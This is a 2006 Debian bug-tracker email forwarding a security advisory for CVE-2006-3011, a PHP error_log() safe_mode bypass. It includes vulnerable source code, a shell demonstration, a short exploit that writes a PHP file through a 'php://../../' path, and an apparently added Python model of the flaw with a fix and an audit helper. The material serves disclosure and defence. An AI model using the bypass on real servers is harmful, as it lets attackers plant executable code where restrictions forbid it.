[php-maint] Bug#375643: SECURITY: CVE-2006-3011: error_log() Safe
Mode Bypass PHP 5.1.4 and 4.4.2
Christian Hammers
ch at debian.org
Tue Jun 27 11:16:47 UTC 2006
Package: php4
Version: 4.4.2
Severity: grave
Justification: security
Hello
The following came through bugtraq, please check if we're affected.
bye,
-christian-
On Sun, Jun 25, 2006 at 11:11:34PM -0000, cxib at securityreason.com wrote:
> [error_log() Safe Mode Bypass PHP 5.1.4 and 4.4.2]
>
> Author: Maksymilian Arciemowicz (cXIb8O3)
> Date:
> -Written: 10.6.2006
> -Public: 26.06.2006
> from SECURITYREASON.COM
> CVE-2006-3011
>
> --- 0.Description ---
> PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly.
>
> A nice introduction to PHP by Stig Sæther Bakken can be found at http://www.zend.com/zend/art/intro.php on the Zend website. Also, much of the PHP Conference Material is freely available.
> error_log -- Send an error message somewhere.
>
> --- 1. error_log() Safe Mode Bypass ---
> The error_log() function sends your error message to email, to a file, or to the display. You can send error messages by mail or write them into files. The issue is very simple: error_log() checks safe_mode and open_basedir in the stream function, but URLs aren't allowed to be used, and the problem exists in an incorrect filename.
>
> PHP5:
> -2013-2050---
> PHPAPI int _php_error_log(int opt_err, char *message, char *opt, char *headers TSRMLS_DC)
> {
> php_stream *stream = NULL;
>
> switch (opt_err) {
>
> case 1: /*send an email */
> {
> #if HAVE_SENDMAIL
> if (!php_mail(opt, "PHP error_log message", message, headers, NULL TSRMLS_CC)) {
> return FAILURE;
> }
> #else
> php_error_docref(NULL TSRMLS_CC, E_WARNING, "Mail option not available!");
> return FAILURE;
> #endif
> }
> break;
>
> case 2: /*send to an address */
> php_error_docref(NULL TSRMLS_CC, E_WARNING, "TCP/IP option not available!");
> return FAILURE;
> break;
>
> case 3: /*save to a file */
> stream = php_stream_open_wrapper(opt, "a", IGNORE_URL | ENFORCE_SAFE_MODE | REPORT_ERRORS, NULL);
> if (!stream)
> return FAILURE;
> php_stream_write(stream, message, strlen(message));
> php_stream_close(stream);
> break;
>
> default:
> php_log_err(message TSRMLS_CC);
> break;
> }
> return SUCCESS;
> }
> -2013-2050---
>
> Let's look at option 3.
>
> -2038 line---
> stream = php_stream_open_wrapper(opt, "a", IGNORE_URL | ENFORCE_SAFE_MODE | REPORT_ERRORS, NULL);
> -2038 line---
>
> Option "a" writes the error to the file, or creates a new file if the file doesn't exist.
> The problem is that in php_stream_open_wrapper() "IGNORE_URL" is defined.
> IGNORE_URL turns off safe_mode if you use "prefix://../../".
>
> -Example---
> cxib# php -r 'error_log("<? echo \"cx\"; ?>", 3, "/www/temp/sr.php");'
>
> Warning: error_log(): SAFE MODE Restriction in effect. The script whose uid is 0 is not allowed to access /www/temp owned by uid 80 in Command line code on line 1
>
> Warning: error_log(/www/temp/sr.php): failed to open stream: Invalid argument in Command line code on line 1
> cxib# php -r 'error_log("<? echo \"cx\"; ?>", 3, "php://../../www/temp/sr.php");'
> cxib# ls -la /www/temp/sr.php
> -rw-r--r-- 1 cxib www 16 Jun 11 17:47 /www/temp/sr.php
> cxib#
> -Example---
>
> --- 2. Exploit ---
> <?php
> $file=""; # FILENAME
> error_log("<? echo \"cx\"; ?>", 3, "php://../../".$file);
> ?>
>
>
> --- 3. How to fix ---
> No response from the PHP Team. We reported this bug on 11.06.2006.
>
> --- 4. Greets ---
>
> For: sp3x
> and
> p_e_a, l3x, pi3, eax, Infospec, gKPc8O3
>
> --- 5. Contact ---
> Author: SecurityReason.Com [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
> Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com
> GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
> SecurityReason.Com
>
--
Christian Hammers WESTEND GmbH | Internet-Business-Provider
Technik CISCO Systems Partner - Authorized Reseller
Lütticher Straße 10 Tel 0241/701333-11
ch at westend.com D-52064 Aachen Fax 0241/911879
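As an added illustration (written for this page; it is neither part of the advisory nor PHP's source), the following Python models the ordering problem the quoted advisory describes for option 3 of error_log(): a destination that looks like a URL is not subjected to the safe_mode/open_basedir restriction, but IGNORE_URL then discards the "scheme://" prefix and the remainder is opened as an ordinary local path, so "../../" in that remainder can reach outside the permitted directory. The hardened variant strips the prefix and canonicalises the path first, then applies the restriction to the path that will really be opened. The directory names, the single-allowed-directory stand-in for safe_mode/open_basedir, the open_for_append_* functions and the small source-audit helper are constructed assumptions, not PHP's implementation.

```python
import posixpath
import re

# Constructed setting: one allowed directory stands in for the
# safe_mode / open_basedir restriction (a simplification, not PHP's logic).
ALLOWED_BASE = "/srv/site/public"
CWD = "/srv/site/public"

_SCHEME_RE = re.compile(r"^([A-Za-z][A-Za-z0-9+.-]*)://(.*)$")


def strip_url_prefix(path):
    """Model of IGNORE_URL: a target written as scheme://rest is treated as
    the plain local path 'rest'; the wrapper prefix is thrown away."""
    m = _SCHEME_RE.match(path)
    return m.group(2) if m else path


def resolve(local, cwd):
    """Resolve a (possibly relative) local path against cwd, collapsing '..'."""
    return posixpath.normpath(posixpath.join(cwd, local))


def within_base(abs_path, base=ALLOWED_BASE):
    """True when abs_path is the allowed directory or lies beneath it."""
    return abs_path == base or abs_path.startswith(base + "/")


def open_for_append_vulnerable(target, cwd=CWD):
    """Ordering modelled on the advisory (assumption): a URL-looking target is
    not checked against the restriction, yet IGNORE_URL then strips the prefix
    and the remainder is opened locally.  Returns 'DENIED' or 'WRITE:<path>'."""
    if not _SCHEME_RE.match(target):
        if not within_base(resolve(target, cwd)):
            return "DENIED"
    local = strip_url_prefix(target)
    return "WRITE:" + resolve(local, cwd)


def open_for_append_fixed(target, cwd=CWD):
    """Hardened ordering: strip the prefix, canonicalise, then restrict the
    path that is actually going to be opened."""
    local = strip_url_prefix(target)
    final = resolve(local, cwd)
    if not within_base(final):
        return "DENIED"
    return "WRITE:" + final


# Code-audit helper: error_log() calls of message type 3 whose destination
# literal begins with a scheme:// prefix deserve a look during review.
_ERROR_LOG_RE = re.compile(
    r"error_log\s*\(.*,\s*3\s*,\s*[\"']([A-Za-z][A-Za-z0-9+.-]*://[^\"']*)[\"']"
)


def find_url_prefixed_error_log(lines):
    """Return [(line_no, prefix), ...] for each matching error_log() call."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = _ERROR_LOG_RE.search(line)
        if m:
            hits.append((n, m.group(1)))
    return hits


# Constructed PHP source lines for the audit helper (not from any real project).
SAMPLE_PHP = [
    'error_log("boot", 3, "/var/log/app/boot.log");',
    'error_log("<? echo \\"cx\\"; ?>", 3, "php://../../".$file);',
    'error_log("mail me", 1, "admin@example.invalid");',
]

if __name__ == "__main__":
    for t in ["/www/temp/sr.php", "php://../../www/temp/sr.php", "log/errors.log"]:
        print(t, "->", open_for_append_vulnerable(t), "|", open_for_append_fixed(t))
    print(find_url_prefixed_error_log(SAMPLE_PHP))
```

Run as a script it prints, for each constructed target, what the modelled vulnerable ordering and the hardened ordering would do; the plain absolute path is refused by both, the "php://../../" form is refused only once the check is applied after prefix stripping and canonicalisation. The audit helper reports line 2 of the constructed sample, the type-3 call whose destination begins with a wrapper prefix.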